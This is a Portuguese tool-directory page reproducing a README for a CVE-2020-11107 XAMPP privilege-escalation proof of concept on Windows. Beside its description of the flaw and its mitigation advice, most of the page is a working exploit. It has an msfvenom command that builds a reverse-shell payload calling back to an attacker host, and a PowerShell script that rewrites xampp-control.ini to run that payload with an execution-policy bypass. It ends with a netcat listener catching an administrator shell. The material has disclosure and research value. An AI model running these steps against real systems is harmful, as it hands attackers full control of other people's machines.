Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation — CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4 | Kitploit
Ferramentas/GitHubGitHub/mohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation
Escalada de PrivilégiosGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubmohnad-al-saif/mohnad-al-saif-cve-2020-11107-xampp-local-privilege-escalation

Mohnad-AL-saif-CVE-2020-11107-XAMPP-Local-Privilege-Escalation

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4

Ver Repositório
11há 8 mesesAinda não revisado

🧨 CVE-2020-11107 – Escalação Local de Privilégios no XAMPP (Windows)

📌 Visão Geral

CVE-2020-11107 é uma vulnerabilidade de Escalação Local de Privilégios (LPE) que afeta o Apache Friends XAMPP no Windows.

Um usuário sem privilégios pode modificar o arquivo de configuração do Painel de Controle do XAMPP (xampp-control.ini) e substituir o executável do editor padrão (notepad.exe) por um executável malicioso.
Quando outro usuário (ex.: Administrador) abre logs por meio do Painel de Controle, o binário malicioso é executado com os privilégios da vítima, resultando em escalação de privilégios.

❗ Esta vulnerabilidade NÃO afeta Linux ou macOS.


🎯 Versões Afetadas

  • XAMPP < 7.2.29
  • XAMPP 7.3.x < 7.3.16
  • XAMPP 7.4.x < 7.4.4

Testado em

  • Windows 10
  • XAMPP 7.3.10

🧠 Causa Raiz

  • xampp-control.ini é gravável globalmente
  • Os caminhos de Editor / Navegador são confiáveis e executados
  • Alterações de configuração afetam todos os usuários
  • Nenhuma validação nos caminhos de executáveis

🗂 Arquivos Importantes

C:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe

🔍 Prova da Vulnerabilidade

Verifique a versão do XAMPP:

type C:\xampp\properties.ini

Exemplo de saída:

base_stack_version=7.3.10-1
base_stack_platform=windows-x64

✅ A versão é vulnerável.


⚔️ Passos de Exploração (PoC)

1️⃣ Gerar Payload Malicioso (Atacante – Kali)

msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe

2️⃣ Transferir Payload para o Alvo

mkdir C:\temp
# Upload msf.exe into C:\temp

3️⃣ Modificar a Configuração do XAMPP (Usuário de Baixo Privilégio)

Script de exploit (PowerShell):

# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file

Execute o script:

powershell -ExecutionPolicy Bypass -File 50337.ps1

4️⃣ Acionar a Execução (Vítima / Administrador)

A vítima executa:

C:\xampp\xampp-control.exe

Em seguida, abre qualquer arquivo de log pelo Painel de Controle.


5️⃣ Capturar o Shell (Atacante)

nc -lvnp 4444

✅ Resultado:

Connection received...
C:\WINDOWS\system32>

🎉 Escalação de Privilégios Bem-sucedida


📈 Impacto

  • Escalação Local de Privilégios
  • Execução Arbitrária de Comandos
  • Comprometimento Total do Sistema (se o Administrador acioná-la)

🛡 Mitigação

  • Atualize o XAMPP para uma das seguintes versões (ou mais recentes):

    • 7.2.29
    • 7.3.16
    • 7.4.4
  • Restrinja as permissões em:

C:\xampp\xampp-control.ini
  • Evite executar o Painel de Controle do XAMPP como Administrador

📚 Referências

  • CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11107
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2020-11107
  • Advisory da Apache Friends: https://www.apachefriends.org/blog/new_xampp_20200401.html
  • Exploit-DB: https://www.exploit-db.com/exploits/50337
  • Pesquisa Original: https://github.com/S1lkys/CVE-2020-11107
Baixar ferramenta